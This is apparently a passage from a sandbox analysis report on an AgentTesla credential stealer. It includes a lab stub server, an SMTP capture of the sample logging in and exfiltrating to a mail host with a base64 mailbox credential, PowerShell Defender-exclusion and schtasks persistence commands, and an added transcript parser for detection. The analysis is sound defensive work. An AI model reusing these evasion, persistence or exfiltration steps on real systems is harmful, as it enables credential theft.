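            # /line/ gives one value per line; booleans render as true/false like the real service
            text = "".join(f"{json.dumps(v) if isinstance(v, bool) else v}\n" for v in values.values())
            return 200, "text/plain; charset=utf-8", text.encode()
        if url.path.startswith("/json"):
            return 200, "application/json; charset=utf-8", json.dumps(values, separators=(",", ":")).encode()
        return 404, "text/plain; charset=utf-8", b"not found\n"
    # api.ipify.org: the bare address, or {"ip": ...} when ?format=json is requested
    if query.get("format", [""])[0] == "json":
        return 200, "application/json", json.dumps({"ip": FAKE_PUBLIC_IP}, separators=(",", ":")).encode()
    return 200, "text/plain", FAKE_PUBLIC_IP.encode()


class StubHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, ctype, body = respond(self.headers.get("Host", ""), self.path)
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        # One line per request: which client asked which host for what is the useful record.
        print(f"[stub] {self.client_address[0]} Host={self.headers.get('Host', '-')} {self.path}")


def make_server(bind="0.0.0.0", port=80) -> HTTPServer:
    return HTTPServer((bind, port), StubHandler)


if __name__ == "__main__":
    srv = make_server()
    print(f"serving api.ipify.org / ip-api.com stub on {srv.server_address}")
    srv.serve_forever()
```

The stub only speaks plain HTTP. The api.ipify.org request in the report goes to port 443, so for that host the lab also needs a TLS front (a reverse proxy with a certificate the analysis VM trusts, or a transparent interception proxy) in front of this listener; the ip-api.com request is plain HTTP on port 80 and can hit the stub directly.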


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
May 27, 2024 12:30:50.066251040 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
May 27, 2024 12:30:50.066463947 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143 | EHLO 494126
May 27, 2024 12:30:50.221824884 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6 | 250-us2.outbound.mailhostbox.com
250-PIPELINING
250-SIZE 41648128
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 CHUNKING
May 27, 2024 12:30:50.222951889 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143 | AUTH login dGVjaDFAc2FudG9uc3dpdGNoZ2VhcnMuY29t
May 27, 2024 12:30:50.380045891 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6 | 334 UGFzc3dvcmQ6
May 27, 2024 12:30:50.541346073 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6 | 235 2.7.0 Authentication successful
May 27, 2024 12:30:50.541837931 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143 | MAIL FROM:<tech1@santonswitchgears.com>
May 27, 2024 12:30:50.700901031 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6 | 250 2.1.0 Ok
May 27, 2024 12:30:50.701725006 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143 | RCPT TO:<tech1@santonswitchgears.com>
May 27, 2024 12:30:50.895111084 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6 | 250 2.1.5 Ok
May 27, 2024 12:30:50.895273924 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143 | DATA
May 27, 2024 12:30:51.050965071 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6 | 354 End data with <CR><LF>.<CR><LF>
May 27, 2024 12:30:51.051630020 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143 | .
May 27, 2024 12:30:51.423968077 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6 | 250 2.0.0 Ok: queued as CA5D7B80007
May 27, 2024 12:30:53.386446953 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
May 27, 2024 12:30:53.386634111 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143 | EHLO 494126
May 27, 2024 12:30:53.542809010 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6 | 250-us2.outbound.mailhostbox.com
250-PIPELINING
250-SIZE 41648128
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 CHUNKING
May 27, 2024 12:30:53.543119907 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143 | AUTH login dGVjaDFAc2FudG9uc3dpdGNoZ2VhcnMuY29t
May 27, 2024 12:30:53.711282015 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6 | 334 UGFzc3dvcmQ6
May 27, 2024 12:30:53.874255896 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6 | 235 2.7.0 Authentication successful
May 27, 2024 12:30:53.874505043 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143 | MAIL FROM:<tech1@santonswitchgears.com>
May 27, 2024 12:30:54.032294989 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6 | 250 2.1.0 Ok
May 27, 2024 12:30:54.032536030 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143 | RCPT TO:<tech1@santonswitchgears.com>
May 27, 2024 12:30:54.211364985 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6 | 250 2.1.5 Ok
May 27, 2024 12:30:54.211828947 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143 | DATA
May 27, 2024 12:30:54.368985891 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6 | 354 End data with <CR><LF>.<CR><LF>
May 27, 2024 12:30:54.370040894 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143 | .
May 27, 2024 12:30:54.757467031 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6 | 250 2.0.0 Ok: queued as 2319CB80429
May 27, 2024 12:32:29.042032957 CEST | 49705 | 587 | 192.168.2.6 | 208.91.198.143 | QUIT
May 27, 2024 12:32:29.197567940 CEST | 587 | 49705 | 208.91.198.143 | 192.168.2.6 | 221 2.0.0 Bye
May 27, 2024 12:32:32.838365078 CEST | 49709 | 587 | 192.168.2.6 | 208.91.198.143 | QUIT
May 27, 2024 12:32:32.998485088 CEST | 587 | 49709 | 208.91.198.143 | 192.168.2.6 | 221 2.0.0 Bye
The AUTH LOGIN argument is the base64 of the mailbox tech1@santonswitchgears.com and the 334 reply is the base64 of "Password:"; the client's password line is not shown in this capture, but the 235 reply confirms the server accepted it. Both sessions authenticate in the clear (the server offers STARTTLS, the client never issues it), use the same mailbox as sender and recipient, and each get one message queued, so the credential and the drop box are both recoverable from the pcap.
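
The two sessions above (source ports 49705 and 49709) are the same exchange twice. A transcript like this is worth parsing rather than eyeballing: the AUTH token and the 334 challenge are plain base64, the envelope tells you the compromised mailbox mails itself, and the absence of STARTTLS tells you the credential is on the wire. What follows is an added example, not code from the report: a parser for such transcripts and a scorer for this exfil pattern. SAMPLE_TRANSCRIPT is constructed from the first session above ("C:" is the sample, "S:" the server); the client's password reply is not in the report and so is absent here too. The two-step AUTH LOGIN form and AUTH PLAIN (RFC 4616) are handled as well, which goes beyond what the page shows.

```python
import base64
import re

# Added example (not from the Joe Sandbox report). Transcript constructed from the report's
# first SMTP session (49705 -> 208.91.198.143:587): "C:" is the sample, "S:" the server. The
# client's reply to the 334 challenge is not shown in the report, so it is absent here too.
SAMPLE_TRANSCRIPT = """\
S: 220 us2.outbound.mailhostbox.com ESMTP Postfix
C: EHLO 494126
S: 250-STARTTLS
S: 250 AUTH PLAIN LOGIN
C: AUTH login dGVjaDFAc2FudG9uc3dpdGNoZ2VhcnMuY29t
S: 334 UGFzc3dvcmQ6
S: 235 2.7.0 Authentication successful
C: MAIL FROM:<tech1@santonswitchgears.com>
S: 250 2.1.0 Ok
C: RCPT TO:<tech1@santonswitchgears.com>
S: 250 2.1.5 Ok
S: 250 2.0.0 Ok: queued as CA5D7B80007
"""

SMTP_VERBS = {"EHLO", "HELO", "MAIL", "RCPT", "DATA", "QUIT", "RSET", "NOOP", "AUTH", "STARTTLS"}
ADDR_RE = re.compile(r"<([^>]*)>")


def b64_text(token: str) -> str:
    """Decode a base64 SASL token to text; '' if it is not valid base64."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def split_plain(token: str):
    """AUTH PLAIN initial response is [authzid] NUL authcid NUL password (RFC 4616)."""
    fields = b64_text(token).split("\0")
    return (fields[-2], fields[-1]) if len(fields) >= 3 else ("", "")


def parse_smtp_transcript(text: str) -> dict:
    """Walk 'C: ...' / 'S: ...' lines and collect what the capture gives away."""
    s = {"ehlo": "", "starttls_offered": False, "starttls_used": False, "auth_mechanism": "",
         "auth_user": "", "auth_password": "", "auth_ok": False, "mail_from": "",
         "rcpt_to": [], "queued": []}
    expect = None  # "username" or "password": what the next bare client line in AUTH LOGIN is
    for raw in text.splitlines():
        if len(raw) < 3 or raw[1] != ":":
            continue
        side, line = raw[0], raw[2:].strip()
        if side == "S":
            code = line[:3]
            if code == "250" and line[4:].upper().startswith("STARTTLS"):
                s["starttls_offered"] = True
            elif code == "250" and "queued as" in line:
                s["queued"].append(line.rsplit(" ", 1)[-1])
            elif code == "235":
                s["auth_ok"], expect = True, None
            continue
        verb = line.split(" ", 1)[0].upper()
        if expect and verb not in SMTP_VERBS:  # heuristic: a non-command line is the next token
            s["auth_user" if expect == "username" else "auth_password"] = b64_text(line)
            expect = "password" if expect == "username" else None
            continue
        if verb in ("EHLO", "HELO"):
            s["ehlo"] = line[5:]
        elif verb == "STARTTLS":
            s["starttls_used"] = True
        elif verb == "AUTH":
            parts = line.split()
            mech = parts[1].upper() if len(parts) > 1 else ""
            initial = parts[2] if len(parts) > 2 else ""
            s["auth_mechanism"] = mech
            if mech == "LOGIN":
                s["auth_user"] = b64_text(initial)
                expect = "password" if initial else "username"
            elif mech == "PLAIN" and initial:
                s["auth_user"], s["auth_password"] = split_plain(initial)
        elif verb in ("MAIL", "RCPT"):
            m = ADDR_RE.search(line)
            if verb == "MAIL":
                s["mail_from"] = m.group(1) if m else ""
            elif m:
                s["rcpt_to"].append(m.group(1))
    return s


def exfil_indicators(s: dict) -> list:
    """Plain-string findings; all three fire on the session in the report."""
    f = []
    if s["auth_ok"] and not s["starttls_used"]:
        f.append("AUTH succeeded without STARTTLS: credentials are recoverable from the pcap")
    if s["mail_from"] and s["rcpt_to"] == [s["mail_from"]]:
        f.append("mail sent from a mailbox to itself: the compromised account is the drop box")
    if s["queued"]:
        f.append("server queued %d message(s): %s" % (len(s["queued"]), ", ".join(s["queued"])))
    return f


if __name__ == "__main__":
    sess = parse_smtp_transcript(SAMPLE_TRANSCRIPT)
    print("AUTH", sess["auth_mechanism"], "as", sess["auth_user"], "->", sess["rcpt_to"])
    print("\n".join(" - " + x for x in exfil_indicators(sess)))
```

The token-versus-command test is a heuristic: a client line that is not an SMTP verb while an AUTH dialogue is open is treated as the next credential token, which is what a real capture looks like but would misread a password whose base64 happens to spell a verb. Feed it the server side too, since the 235 reply is what closes the dialogue and confirms the credential worked.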


                                                Target ID:0
                                                Start time:06:30:42
                                                Start date:27/05/2024
                                                Path:C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
                                                Imagebase:0x1e0000
                                                File size:708'096 bytes
                                                MD5 hash:B7DB10EC32FE6F53EE4A76E261761C27
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:3
                                                Start time:06:30:44
                                                Start date:27/05/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
                                                Imagebase:0xa40000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:4
                                                Start time:06:30:44
                                                Start date:27/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:06:30:44
                                                Start date:27/05/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"
                                                Imagebase:0xa40000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:06:30:44
                                                Start date:27/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:06:30:44
                                                Start date:27/05/2024
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp"
                                                Imagebase:0x8f0000
                                                File size:187'904 bytes
                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:06:30:44
                                                Start date:27/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:06:30:45
                                                Start date:27/05/2024
                                                Path:C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
                                                Imagebase:0x770000
                                                File size:708'096 bytes
                                                MD5 hash:B7DB10EC32FE6F53EE4A76E261761C27
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4534288426.0000000000437000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.4534288426.0000000000437000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4538007808.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.4538007808.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Target ID:10
                                                Start time:06:30:46
                                                Start date:27/05/2024
                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                Imagebase:0x7ff717f30000
                                                File size:496'640 bytes
                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:11
                                                Start time:06:30:47
                                                Start date:27/05/2024
                                                Path:C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
                                                Imagebase:0x350000
                                                File size:708'096 bytes
                                                MD5 hash:B7DB10EC32FE6F53EE4A76E261761C27
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 63%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                Target ID:12
                                                Start time:06:30:48
                                                Start date:27/05/2024
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpE0F1.tmp"
                                                Imagebase:0x8f0000
                                                File size:187'904 bytes
                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:13
                                                Start time:06:30:49
                                                Start date:27/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:06:30:49
                                                Start date:27/05/2024
                                                Path:C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"
                                                Imagebase:0x9f0000
                                                File size:708'096 bytes
                                                MD5 hash:B7DB10EC32FE6F53EE4A76E261761C27
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4538569081.000000000308D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false


                                                  Execution Graph

                                                  Execution Coverage:12.3%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:241
                                                  Total number of Limit Nodes:15
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2129060307.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4b20000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b89d78672916e3f9f152f125738f4766f21a59c2b3145325b04b8471e1a1c872
                                                  • Instruction ID: 849feda3e50a803913ef95f97f169df380dafb23ab908dc1cef4a51a6eb7a1bc
                                                  • Opcode Fuzzy Hash: b89d78672916e3f9f152f125738f4766f21a59c2b3145325b04b8471e1a1c872
                                                  • Instruction Fuzzy Hash: AE82B334A01228CFDB54DF64C994B99B7B2FF8A304F1185E9D509AB365DB30AE85CF41
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8b60a0cbe9b4c65561b0e186d01e4d30b76ed68129ac1d68f8e777fd5e6f3f9f
                                                  • Instruction ID: c9cb312cc9804d4a3a283884bbbd44af2a7b50d0369926f53f64004fb5e2ece6
                                                  • Opcode Fuzzy Hash: 8b60a0cbe9b4c65561b0e186d01e4d30b76ed68129ac1d68f8e777fd5e6f3f9f
                                                  • Instruction Fuzzy Hash: 50C19971B016048FE799EB75C920B6EB7E6AFC9700F1484ADD24A9B391CF35E805CB52
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 999b1a715eab26c3f9c4df609f8757f09a985ceb922d7ce1c7f89a2099437fa4
                                                  • Instruction ID: fcdf5cf09a43658799183b0781e162e6c103f52c7f9e73737e5c660b723c2ea2
                                                  • Opcode Fuzzy Hash: 999b1a715eab26c3f9c4df609f8757f09a985ceb922d7ce1c7f89a2099437fa4
                                                  • Instruction Fuzzy Hash: 51E08674C4F690CFD781FB745D445F0BF78AB87201B0920EE8108AF257C628C805C765

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00BFD136
                                                  • GetCurrentThread.KERNEL32 ref: 00BFD173
                                                  • GetCurrentProcess.KERNEL32 ref: 00BFD1B0
                                                  • GetCurrentThreadId.KERNEL32 ref: 00BFD209
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID: px]/
                                                  • API String ID: 2063062207-3026016296
                                                  • Opcode ID: 076025375e827d502d925cf057dfe0878c7e3ccd715ddadd6961fb8b5870a14b
                                                  • Instruction ID: 93372d5d64d9e817c3a05c7dfda7b8f6b82f48dd673709d2c7b7e51ce010e915
                                                  • Opcode Fuzzy Hash: 076025375e827d502d925cf057dfe0878c7e3ccd715ddadd6961fb8b5870a14b
                                                  • Instruction Fuzzy Hash: 2F5189B09013498FDB44DFA9D548BEEBFF1EF88314F208099E108A7360DB789949CB61

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00BFD136
                                                  • GetCurrentThread.KERNEL32 ref: 00BFD173
                                                  • GetCurrentProcess.KERNEL32 ref: 00BFD1B0
                                                  • GetCurrentThreadId.KERNEL32 ref: 00BFD209
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID: px]/
                                                  • API String ID: 2063062207-3026016296
                                                  • Opcode ID: 415c598dbba0d22fb416e792b42c8cf730b58efa28366375741014a8dfc511aa
                                                  • Instruction ID: d181f967df4a9134d10e24f78924b7f3f1c8a00c8bd30e521a045aa93678b03d
                                                  • Opcode Fuzzy Hash: 415c598dbba0d22fb416e792b42c8cf730b58efa28366375741014a8dfc511aa
                                                  • Instruction Fuzzy Hash: 2E5159B09013098FDB54DFA9D548BAEBBF1EF88314F208459E509B7350DB78A944CB65

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 44 6a479bc-6a479c5 45 6a479c7-6a47a5d 44->45 46 6a479b3 44->46 48 6a47a96-6a47ab6 45->48 49 6a47a5f-6a47a69 45->49 56 6a47aef-6a47b1e 48->56 57 6a47ab8-6a47ac2 48->57 49->48 50 6a47a6b-6a47a6d 49->50 51 6a47a90-6a47a93 50->51 52 6a47a6f-6a47a79 50->52 51->48 54 6a47a7d-6a47a8c 52->54 55 6a47a7b 52->55 54->54 58 6a47a8e 54->58 55->54 63 6a47b57-6a47c11 CreateProcessA 56->63 64 6a47b20-6a47b2a 56->64 57->56 59 6a47ac4-6a47ac6 57->59 58->51 61 6a47ac8-6a47ad2 59->61 62 6a47ae9-6a47aec 59->62 65 6a47ad4 61->65 66 6a47ad6-6a47ae5 61->66 62->56 77 6a47c13-6a47c19 63->77 78 6a47c1a-6a47ca0 63->78 64->63 68 6a47b2c-6a47b2e 64->68 65->66 66->66 67 6a47ae7 66->67 67->62 69 6a47b30-6a47b3a 68->69 70 6a47b51-6a47b54 68->70 72 6a47b3c 69->72 73 6a47b3e-6a47b4d 69->73 70->63 72->73 73->73 75 6a47b4f 73->75 75->70 77->78 88 6a47cb0-6a47cb4 78->88 89 6a47ca2-6a47ca6 78->89 90 6a47cc4-6a47cc8 88->90 91 6a47cb6-6a47cba 88->91 89->88 92 6a47ca8 89->92 94 6a47cd8-6a47cdc 90->94 95 6a47cca-6a47cce 90->95 91->90 93 6a47cbc 91->93 92->88 93->90 97 6a47cee-6a47cf5 94->97 98 6a47cde-6a47ce4 94->98 95->94 96 6a47cd0 95->96 96->94 99 6a47cf7-6a47d06 97->99 100 6a47d0c 97->100 98->97 99->100 101 6a47d0d 100->101 101->101
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A47BFE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: px]/$px]/
                                                  • API String ID: 963392458-2092919866
                                                  • Opcode ID: 2d1f76c8beef44675ce1b5af10ec6e9b8b78dd5fb1defa583ff711f3068c0383
                                                  • Instruction ID: 6e4552a20a2e0a35df033c0e94f2196bfd01ad9c5b045b5ce67d67dbc7d8a41f
                                                  • Opcode Fuzzy Hash: 2d1f76c8beef44675ce1b5af10ec6e9b8b78dd5fb1defa583ff711f3068c0383
                                                  • Instruction Fuzzy Hash: B8A14B71D002599FEB64EF68CC417EEBBB2FF84314F1485A9E809A7240DB749A85CF91

                                                  Control-flow Graph

